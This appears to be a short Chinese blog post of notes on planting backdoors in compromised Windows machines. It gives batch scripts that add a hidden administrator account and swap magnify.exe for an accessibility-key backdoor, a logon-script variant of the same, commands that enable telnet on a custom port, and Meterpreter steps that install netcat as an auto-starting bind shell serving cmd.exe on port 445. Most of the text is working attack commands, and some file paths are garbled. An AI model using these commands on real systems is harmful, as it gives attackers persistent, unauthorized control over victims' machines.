Windows后门小计

Posted 2021-01-17 feiyucha

嗅探欺骗：

---

在目标机上安装嗅探工具窃取管理员的密码

放大镜替换：

---

 

构造批处理：

　　@echo off
　　net user gslw$ test168 /add
　　net localgroup administrators gslw$ /add
　　%Windir%system32 agnify.exe
　　exit
转换exe文件：
battoexe等工具
文件替换：
　　@echo off
　　copy %Windir%system32dllcachemagnify.exe nagnify.exe
　　copy %Windir%system32magnify.exe nagnify.exe
　　replace.exe %Windir%magnify.exe %Windir%system32dllcache
　　replace.exe %Windir%magnify.exe %Windir%system32
　　exit
后门利用：
Win+U启动辅助工具项，打开放大镜即可

组策略欺骗：

---

在windows开关机启动脚本中做手脚：
@echo off & net user gslw$ test168 /add && netlocalgroup administrators gslw$ /add & exit

telnet利用：

---

远程改端口：“tlntadmn config \192.168.1.9 port=800 -u gslw -p test168 ”
在目标机开启：
tlntadmn config port=2233 //修改 telnet默认端口
sc config tlntsvr start= auto //设置启动类型为自启动
net start telnet //开启telnet服务项
tlntadmn config sec =passwd //设置密码
tlntadmn config port = 800 //设置端口
远程登陆：telnet 192.168.1.9 800 //键入账号密码即可连接

msf（Netcat.exe）：

---

上传到目标系统：meterpreter > upload /usr/share/windows-binaries/nc.exe C:\windows\system32
查看自启：meterpreter > reg enumkey -k HKLM\software\microsoft\windows\currentversion\run
设置自启：meterpreter > reg setval -k HKLM\software\microsoft\windows\currentversion\run -v nc -d ‘C:windowssystem32 c.exe -Ldp 445 -e cmd.exe‘
检查确认：meterpreter > reg queryval -k HKLM\software\microsoft\windows\currentversion\Run -v nc
打开cmd ：meterpreter > execute -f cmd -i
开放445端口：netsh firewall add portopening TCP 445 "Service Firewall" ENABLE ALL
检查是配置：netsh firewall show portopening
后门使用：nc -v 172.16.104.128 445